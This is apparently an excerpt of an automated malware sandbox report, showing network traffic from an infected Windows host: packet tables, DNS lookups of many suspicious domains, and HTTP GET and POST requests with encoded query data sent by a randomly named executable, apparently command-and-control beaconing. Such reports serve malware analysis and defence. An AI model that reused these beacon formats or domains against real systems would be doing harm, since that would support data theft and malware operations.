                                                                                                                                                    Oct 4, 2024 12:04:57.558388948 CEST4982980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:04:57.558500051 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.558515072 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.558636904 CEST4982980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:04:57.558775902 CEST4982980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:04:57.741853952 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.741868973 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.741884947 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.742120981 CEST4982980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:04:57.742295027 CEST4982980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:04:57.745337009 CEST4982980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:04:57.928797960 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:02.760169029 CEST4983080192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:05:02.861751080 CEST804983013.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:02.861922026 CEST4983080192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:05:02.863312960 CEST4983080192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:05:02.963675976 CEST804983013.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:02.964819908 CEST804983013.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:02.964833021 CEST804983013.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:02.965053082 CEST4983080192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:05:02.966886044 CEST4983080192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:05:03.067462921 CEST804983013.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:07.977816105 CEST4983180192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:05:08.282325029 CEST804983143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:08.282634974 CEST4983180192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:05:08.283977032 CEST4983180192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:05:08.587558031 CEST804983143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:08.587613106 CEST804983143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:08.587625027 CEST804983143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:08.587903976 CEST4983180192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:05:08.589792013 CEST4983180192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:05:08.893122911 CEST804983143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:13.601576090 CEST4983280192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:05:13.800251007 CEST804983231.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:13.800441027 CEST4983280192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:05:13.801783085 CEST4983280192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:05:14.000633001 CEST804983231.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:14.457730055 CEST804983231.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:14.458702087 CEST804983231.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:14.458837032 CEST4983280192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:05:14.459964037 CEST4983280192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:05:14.658279896 CEST804983231.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:19.475310087 CEST4983380192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:05:19.626125097 CEST8049833191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:19.626333952 CEST4983380192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:05:19.627696037 CEST4983380192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:05:19.783499002 CEST8049833191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:20.342416048 CEST8049833191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:20.342427969 CEST8049833191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:20.342467070 CEST8049833191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:20.342732906 CEST4983380192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:05:20.344851971 CEST4983380192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:05:20.506663084 CEST8049833191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:25.349033117 CEST4983480192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:05:25.462680101 CEST8049834162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:25.462827921 CEST4983480192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:05:25.464319944 CEST4983480192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:05:25.577817917 CEST8049834162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:25.578280926 CEST8049834162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:25.578363895 CEST8049834162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:25.578613043 CEST4983480192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:05:25.580804110 CEST4983480192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:05:25.694762945 CEST8049834162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:40.933809042 CEST4983580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:05:41.120485067 CEST804983591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:41.120836020 CEST4983580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:05:41.122004986 CEST4983580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:05:41.308866024 CEST804983591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:41.308937073 CEST804983591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:41.309214115 CEST4983580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:05:41.311023951 CEST4983580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:05:41.497668982 CEST804983591.195.240.19192.168.11.20
                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Oct 4, 2024 11:57:17.030560017 CEST5194753192.168.11.201.1.1.1
                                                                                                                                                    Oct 4, 2024 11:57:17.125833988 CEST53519471.1.1.1192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:17.699305058 CEST5050853192.168.11.201.1.1.1
                                                                                                                                                    Oct 4, 2024 11:57:17.794464111 CEST53505081.1.1.1192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:57.659681082 CEST5569453192.168.11.201.1.1.1
                                                                                                                                                    Oct 4, 2024 11:57:57.762329102 CEST53556941.1.1.1192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:02.774257898 CEST5724253192.168.11.201.1.1.1
                                                                                                                                                    Oct 4, 2024 11:58:02.955924034 CEST53572421.1.1.1192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:18.380317926 CEST6052653192.168.11.201.1.1.1
                                                                                                                                                    Oct 4, 2024 11:58:18.517997980 CEST53605261.1.1.1192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:32.081716061 CEST5247353192.168.11.201.1.1.1
                                                                                                                                                    Oct 4, 2024 11:58:32.285661936 CEST53524731.1.1.1192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:45.390846014 CEST5198953192.168.11.201.1.1.1
                                                                                                                                                    Oct 4, 2024 11:58:45.572030067 CEST53519891.1.1.1192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:58:59.308728933 CEST5319153192.168.11.201.1.1.1
                                                                                                                                                    Oct 4, 2024 11:58:59.531753063 CEST53531911.1.1.1192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:12.635586977 CEST5347853192.168.11.201.1.1.1
                                                                                                                                                    Oct 4, 2024 11:59:13.543764114 CEST53534781.1.1.1192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:32.723328114 CEST4926053192.168.11.201.1.1.1
                                                                                                                                                    Oct 4, 2024 11:59:33.253293991 CEST53492601.1.1.1192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:47.282634974 CEST5465253192.168.11.201.1.1.1
                                                                                                                                                    Oct 4, 2024 11:59:47.743871927 CEST53546521.1.1.1192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:00.842680931 CEST5322853192.168.11.201.1.1.1
                                                                                                                                                    Oct 4, 2024 12:00:00.975788116 CEST53532281.1.1.1192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:14.151706934 CEST5269753192.168.11.201.1.1.1
                                                                                                                                                    Oct 4, 2024 12:00:14.254194975 CEST53526971.1.1.1192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:22.306195021 CEST5067353192.168.11.201.1.1.1
                                                                                                                                                    Oct 4, 2024 12:00:22.460211039 CEST53506731.1.1.1192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:35.943870068 CEST5329253192.168.11.201.1.1.1
                                                                                                                                                    Oct 4, 2024 12:00:36.957112074 CEST5329253192.168.11.209.9.9.9
                                                                                                                                                    Oct 4, 2024 12:00:37.513426065 CEST53532929.9.9.9192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:37.531266928 CEST53532921.1.1.1192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:51.659775972 CEST6043953192.168.11.209.9.9.9
                                                                                                                                                    Oct 4, 2024 12:00:51.760237932 CEST53604399.9.9.9192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:59.813678026 CEST5535653192.168.11.209.9.9.9
                                                                                                                                                    Oct 4, 2024 12:00:59.915045977 CEST53553569.9.9.9192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:07.968060017 CEST5655053192.168.11.209.9.9.9
                                                                                                                                                    Oct 4, 2024 12:01:08.180224895 CEST53565509.9.9.9192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:24.713829994 CEST5588253192.168.11.209.9.9.9
                                                                                                                                                    Oct 4, 2024 12:01:24.814486980 CEST53558829.9.9.9192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:32.419601917 CEST6003853192.168.11.209.9.9.9
                                                                                                                                                    Oct 4, 2024 12:03:32.519587994 CEST53600389.9.9.9192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:40.575244904 CEST5231153192.168.11.209.9.9.9
                                                                                                                                                    Oct 4, 2024 12:03:40.674351931 CEST53523119.9.9.9192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:48.729711056 CEST6173953192.168.11.209.9.9.9
                                                                                                                                                    Oct 4, 2024 12:03:48.900536060 CEST53617399.9.9.9192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:02.383013010 CEST5632653192.168.11.209.9.9.9
                                                                                                                                                    Oct 4, 2024 12:04:02.489903927 CEST53563269.9.9.9192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:15.567579985 CEST5228353192.168.11.209.9.9.9
                                                                                                                                                    Oct 4, 2024 12:04:15.739336014 CEST53522839.9.9.9192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:29.345907927 CEST6090453192.168.11.209.9.9.9
                                                                                                                                                    Oct 4, 2024 12:04:29.474507093 CEST53609049.9.9.9192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:34.766040087 CEST6323553192.168.11.209.9.9.9
                                                                                                                                                    Oct 4, 2024 12:04:34.866409063 CEST53632359.9.9.9192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:30.596968889 CEST5641953192.168.11.209.9.9.9
                                                                                                                                                    Oct 4, 2024 12:05:30.696662903 CEST53564199.9.9.9192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:35.706357956 CEST5799053192.168.11.209.9.9.9
                                                                                                                                                    Oct 4, 2024 12:05:35.812764883 CEST53579909.9.9.9192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:40.830218077 CEST6323553192.168.11.209.9.9.9
                                                                                                                                                    Oct 4, 2024 12:05:40.932153940 CEST53632359.9.9.9192.168.11.20
                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                    Oct 4, 2024 11:57:17.030560017 CEST192.168.11.201.1.1.10x8b8aStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:57:17.699305058 CEST192.168.11.201.1.1.10x2b3fStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:57:57.659681082 CEST192.168.11.201.1.1.10x5efeStandard query (0)www.seninbeniimikaf.buzzA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:58:02.774257898 CEST192.168.11.201.1.1.10x91b4Standard query (0)www.eagleup.orgA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:58:18.380317926 CEST192.168.11.201.1.1.10xceb1Standard query (0)www.strategyvanguard.comA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:58:32.081716061 CEST192.168.11.201.1.1.10xe68fStandard query (0)www.philippatston.comA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:58:45.390846014 CEST192.168.11.201.1.1.10x4565Standard query (0)www.stayvact.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:58:59.308728933 CEST192.168.11.201.1.1.10x7eaeStandard query (0)www.sleephygienist.orgA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:59:12.635586977 CEST192.168.11.201.1.1.10x3b86Standard query (0)www.xn--fhq1c541j0zr.comA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:59:32.723328114 CEST192.168.11.201.1.1.10x5ad2Standard query (0)www.jennarauten.comA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:59:47.282634974 CEST192.168.11.201.1.1.10x4a4aStandard query (0)www.taketechai.comA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:00:00.842680931 CEST192.168.11.201.1.1.10xff9eStandard query (0)www.297tamatest1kb.comA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:00:14.151706934 CEST192.168.11.201.1.1.10x1451Standard query (0)www.99b6q.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:00:22.306195021 CEST192.168.11.201.1.1.10x4170Standard query (0)www.ytfunnels.comA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:00:35.943870068 CEST192.168.11.201.1.1.10xd5d1Standard query (0)www.hedieplastic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:00:36.957112074 CEST192.168.11.209.9.9.90xd5d1Standard query (0)www.hedieplastic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:00:51.659775972 CEST192.168.11.209.9.9.90x54d7Standard query (0)www.helpers-lion.onlineA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:00:59.813678026 CEST192.168.11.209.9.9.90x2b81Standard query (0)www.doodstream.beautyA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:01:07.968060017 CEST192.168.11.209.9.9.90xc70dStandard query (0)www.gipsytroya.comA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:01:24.713829994 CEST192.168.11.209.9.9.90x3658Standard query (0)www.seninbeniimikaf.buzzA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:03:32.419601917 CEST192.168.11.209.9.9.90x64d0Standard query (0)www.99b6q.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:03:40.575244904 CEST192.168.11.209.9.9.90xc3cbStandard query (0)www.seninbeniimikaf.buzzA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:03:48.729711056 CEST192.168.11.209.9.9.90x1482Standard query (0)www.eagleup.orgA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:04:02.383013010 CEST192.168.11.209.9.9.90x1091Standard query (0)www.5597043.comA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:04:15.567579985 CEST192.168.11.209.9.9.90x2583Standard query (0)www.drivemktg.coA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:04:29.345907927 CEST192.168.11.209.9.9.90x13f5Standard query (0)www.dadayute.comA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:04:34.766040087 CEST192.168.11.209.9.9.90xb44bStandard query (0)www.seninbeniimikaf.buzzA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:05:30.596968889 CEST192.168.11.209.9.9.90x3b03Standard query (0)www.99b6q.xyzA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:05:35.706357956 CEST192.168.11.209.9.9.90x9085Standard query (0)www.inform-you.comA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:05:40.830218077 CEST192.168.11.209.9.9.90x7163Standard query (0)www.gipsytroya.comA (IP address)IN (0x0001)false
                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                    Oct 4, 2024 11:57:17.125833988 CEST1.1.1.1192.168.11.200x8b8aNo error (0)drive.google.com142.251.40.174A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:57:17.794464111 CEST1.1.1.1192.168.11.200x2b3fNo error (0)drive.usercontent.google.com142.250.176.193A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:57:57.762329102 CEST1.1.1.1192.168.11.200x5efeName error (3)www.seninbeniimikaf.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:58:02.955924034 CEST1.1.1.1192.168.11.200x91b4No error (0)www.eagleup.orgparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:58:02.955924034 CEST1.1.1.1192.168.11.200x91b4No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:58:18.517997980 CEST1.1.1.1192.168.11.200xceb1No error (0)www.strategyvanguard.com185.134.245.113A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:58:32.285661936 CEST1.1.1.1192.168.11.200xe68fNo error (0)www.philippatston.comcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:58:32.285661936 CEST1.1.1.1192.168.11.200xe68fNo error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:58:32.285661936 CEST1.1.1.1192.168.11.200xe68fNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com184.73.212.51A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:58:32.285661936 CEST1.1.1.1192.168.11.200xe68fNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com18.235.170.27A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:58:45.572030067 CEST1.1.1.1192.168.11.200x4565No error (0)www.stayvact.xyz199.192.19.19A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:58:59.531753063 CEST1.1.1.1192.168.11.200x7eaeNo error (0)www.sleephygienist.org13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:58:59.531753063 CEST1.1.1.1192.168.11.200x7eaeNo error (0)www.sleephygienist.org76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:59:13.543764114 CEST1.1.1.1192.168.11.200x3b86No error (0)www.xn--fhq1c541j0zr.com43.252.167.188A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:59:33.253293991 CEST1.1.1.1192.168.11.200x5ad2No error (0)www.jennarauten.comjennarauten.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:59:33.253293991 CEST1.1.1.1192.168.11.200x5ad2No error (0)jennarauten.com31.217.192.158A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:59:47.743871927 CEST1.1.1.1192.168.11.200x4a4aNo error (0)www.taketechai.comwww.taketechai.com.cdn.hstgr.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 11:59:47.743871927 CEST1.1.1.1192.168.11.200x4a4aNo error (0)www.taketechai.com.cdn.hstgr.net191.101.104.164A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:00:00.975788116 CEST1.1.1.1192.168.11.200xff9eNo error (0)www.297tamatest1kb.com162.255.119.150A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:00:14.254194975 CEST1.1.1.1192.168.11.200x1451Name error (3)www.99b6q.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:00:22.460211039 CEST1.1.1.1192.168.11.200x4170No error (0)www.ytfunnels.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:00:22.460211039 CEST1.1.1.1192.168.11.200x4170No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:00:37.513426065 CEST9.9.9.9192.168.11.200xd5d1No error (0)www.hedieplastic.com46.102.130.116A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:00:37.531266928 CEST1.1.1.1192.168.11.200xd5d1No error (0)www.hedieplastic.com46.102.130.116A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:00:51.760237932 CEST9.9.9.9192.168.11.200x54d7Name error (3)www.helpers-lion.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:00:59.915045977 CEST9.9.9.9192.168.11.200x2b81Name error (3)www.doodstream.beautynonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:01:08.180224895 CEST9.9.9.9192.168.11.200xc70dNo error (0)www.gipsytroya.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:01:08.180224895 CEST9.9.9.9192.168.11.200xc70dNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:01:24.814486980 CEST9.9.9.9192.168.11.200x3658Name error (3)www.seninbeniimikaf.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:03:32.519587994 CEST9.9.9.9192.168.11.200x64d0Name error (3)www.99b6q.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:03:40.674351931 CEST9.9.9.9192.168.11.200xc3cbName error (3)www.seninbeniimikaf.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:03:48.900536060 CEST9.9.9.9192.168.11.200x1482No error (0)www.eagleup.orgparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:03:48.900536060 CEST9.9.9.9192.168.11.200x1482No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:04:02.489903927 CEST9.9.9.9192.168.11.200x1091No error (0)www.5597043.comstar-web-prod-1839730.pages.devCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:04:02.489903927 CEST9.9.9.9192.168.11.200x1091No error (0)star-web-prod-1839730.pages.dev172.66.44.73A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:04:02.489903927 CEST9.9.9.9192.168.11.200x1091No error (0)star-web-prod-1839730.pages.dev172.66.47.183A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:04:15.739336014 CEST9.9.9.9192.168.11.200x2583No error (0)www.drivemktg.co193.108.130.23A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:04:29.474507093 CEST9.9.9.9192.168.11.200x13f5No error (0)www.dadayute.com74.208.236.225A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:04:34.866409063 CEST9.9.9.9192.168.11.200xb44bName error (3)www.seninbeniimikaf.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:05:30.696662903 CEST9.9.9.9192.168.11.200x3b03Name error (3)www.99b6q.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:05:35.812764883 CEST9.9.9.9192.168.11.200x9085Name error (3)www.inform-you.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:05:40.932153940 CEST9.9.9.9192.168.11.200x7163No error (0)www.gipsytroya.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Oct 4, 2024 12:05:40.932153940 CEST9.9.9.9192.168.11.200x7163No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                                                                    • drive.google.com
                                                                                                                                                    • drive.usercontent.google.com
                                                                                                                                                    • www.eagleup.org
                                                                                                                                                    • www.strategyvanguard.com
                                                                                                                                                    • www.philippatston.com
                                                                                                                                                    • www.stayvact.xyz
                                                                                                                                                    • www.sleephygienist.org
                                                                                                                                                    • www.xn--fhq1c541j0zr.com
                                                                                                                                                    • www.jennarauten.com
                                                                                                                                                    • www.taketechai.com
                                                                                                                                                    • www.297tamatest1kb.com
                                                                                                                                                    • www.ytfunnels.com
                                                                                                                                                    • www.hedieplastic.com
                                                                                                                                                    • www.gipsytroya.com
                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    0192.168.11.204973291.195.240.19801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:58:03.145682096 CEST425OUTGET /71zx/?PbG=AARSfT6a63OJ+ysKR1MfeqvfIcR88MbG43x9Boc0SUqgrVW8gAnMDpyGPh1Ao5w62hQmbE5oBsYcO67emJ0/QAD3KEhLGLbjOOzz32cV6rq6jXBkG/unsus=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.eagleup.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 11:58:03.329385042 CEST113INHTTP/1.1 439
                                                                                                                                                    date: Fri, 04 Oct 2024 09:58:03 GMT
                                                                                                                                                    content-length: 0
                                                                                                                                                    server: Parking/1.0
                                                                                                                                                    connection: close


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    1192.168.11.2049733185.134.245.113801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:58:18.719450951 CEST708OUTPOST /nx20/ HTTP/1.1
                                                                                                                                                    Host: www.strategyvanguard.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.strategyvanguard.com
                                                                                                                                                    Referer: http://www.strategyvanguard.com/nx20/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
